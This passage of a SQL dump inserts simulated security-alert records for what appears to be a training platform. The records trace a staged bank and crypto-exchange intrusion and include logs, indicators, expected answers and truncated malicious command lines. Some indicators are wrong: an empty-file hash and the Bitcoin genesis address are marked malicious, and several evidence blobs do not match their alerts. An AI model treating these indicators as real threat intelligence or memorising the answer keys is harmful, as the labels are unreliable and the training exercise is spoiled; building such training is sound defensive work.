campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to multiple spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with CryptoCore APT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email Detected\",\"date\":\"2026-03-07T14:15:20.836Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1452, 'Malicious Document Execution', 'high', 'Endpoint protection alerts', 'Following the phishing success, a malicious document is executed on the victim\'s device, deploying malware designed to extract stored credentials.', 'Malware Deployment', 'T1203 - Exploitation for Client Execution', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-13T14:23:45Z\",\"event_id\":\"4567\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"invoice_2023.docx\",\"file_hash\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"user\":\"jdoe\",\"device_name\":\"JD-LAPTOP\",\"malware_family\":\"Emotet\",\"action_taken\":\"File quarantined\"}', '2026-03-07 00:50:13', '2026-03-09 05:49:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Emotet malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection Logs\",\"verdict\":\"suspicious\",\"details\":\"File commonly used in phishing schemes.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account on the 
network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1453, 'Credential Harvesting via Password Manager Exploit', 'high', 'Password manager access logs', 'CryptoCore exploits vulnerabilities in the password manager software, siphoning off sensitive credentials for further access.', 'Credential Access', 'T1003.005', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"PM-2023-1005-0003\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"user\":\"jdoe\",\"filename\":\"password_manager_exploit_v2.dll\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Unauthorized Access\",\"description\":\"Detected exploitation of password manager vulnerability using known exploit DLL.\"}', '2026-03-07 00:50:13', '2026-03-09 05:50:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"password_manager_exploit_v2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"Exploit DLL used in targeting password managers.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exploit used by CryptoCore.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 
'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1454, 'Lateral Movement Detected', 'high', 'Network intrusion detection system', 'Armed with harvested credentials, the attackers penetrate deeper into the network, seeking access to the exchange\'s core financial systems.', 'Internal Network Propagation', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_id\":\"evt-45678\",\"source_ip\":\"10.5.3.25\",\"destination_ip\":\"192.168.14.45\",\"attacker_ip\":\"203.0.113.15\",\"username\":\"jdoe\",\"filename\":\"malicious_payload.exe\",\"hash\":\"3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\",\"event_type\":\"lateral_movement\",\"description\":\"Suspicious lateral movement detected using harvested credentials to access core financial systems.\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-03-07 00:50:13', '2026-03-09 05:51:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.5.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.14.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted for access.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Public IP associated with known malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Identified as part of a known malware 
toolkit.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1455, 'Data Exfiltration Attempt', 'high', 'Data loss prevention system', 'CryptoCore executed a final exfiltration attempt to transfer substantial volumes of financial data and cryptocurrency to external wallets.', 'Data Theft', 'T1041: Exfiltration Over C2 Channel', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T10:45:23Z\",\"event\":{\"type\":\"data_exfiltration_attempt\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.93.1.23\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"financial_report_Q3.xlsx\",\"destination_wallet\":\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"protocol\":\"HTTPS\",\"data_volume\":\"2GB\"}}', '2026-03-07 00:50:13', '2026-03-09 05:52:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.93.1.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used in previous CryptoCore operations.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash of file associated with suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Regular financial report 
file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:14:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:13:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:12:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:11:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1456, 'Suspicious Access to Transaction Switch', 'high', 'Network Logs', 'An unauthorized access attempt was detected targeting the bank\'s transaction switch system. This activity is indicative of an initial access phase by APT38, known for financial theft and destructive operations.', 'Initial Access', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T02:45:37Z\",\"event_id\":\"1005\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.50\",\"destination_port\":\"8080\",\"protocol\":\"TCP\",\"action\":\"ALLOWED\",\"username\":\"j.doe\",\"attempted_resource\":\"/bank/transaction/switch\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"APT38_tool.bin\"}', '2026-03-07 00:50:56', '2026-03-09 05:41:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT38 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of bank\'s transaction switch.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT38 malware tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT38_tool.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable used in APT38\'s operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1457, 'Malicious Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'A custom malware was executed on the host to alter transaction codes, enabling unauthorized withdrawals from targeted ATMs.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"EDR-2023-1005-001\",\"source_ip\":\"185.92.220.123\",\"destination_ip\":\"192.168.10.25\",\"username\":\"atm_operator\",\"executed_process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"cmd.exe /c C:\\\\Malware\\\\ATMCodeChanger.exe\",\"file_hash\":\"b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\",\"malware_filename\":\"ATMCodeChanger.exe\",\"severity\":\"Critical\",\"description\":\"Execution of a known malicious file associated with unauthorized transaction manipulation.\"}', '2026-03-07 00:50:56', '2026-03-09 05:43:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted endpoint.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ATMCodeChanger.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with unauthorized transaction 
manipulation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1458, 'Establishing Persistent Access', 'high', 'System Configuration Logs', 'APT38 has been detected establishing persistent access within the bank\'s infrastructure by creating backdoors. The operation involves setting up scheduled tasks and modifying startup scripts to maintain control over the compromised systems.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"4625\",\"hostname\":\"bankserver01\",\"user\":\"SYSTEM\",\"src_ip\":\"192.168.1.45\",\"attacker_ip\":\"51.15.123.45\",\"scheduled_task\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\UpdateCheck\",\"malware_filename\":\"svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Task Created\",\"description\":\"A scheduled task was created to run malicious executable at startup.\"}', '2026-03-07 00:50:56', '2026-03-09 05:44:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"51.15.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious executable mimicking legitimate system 
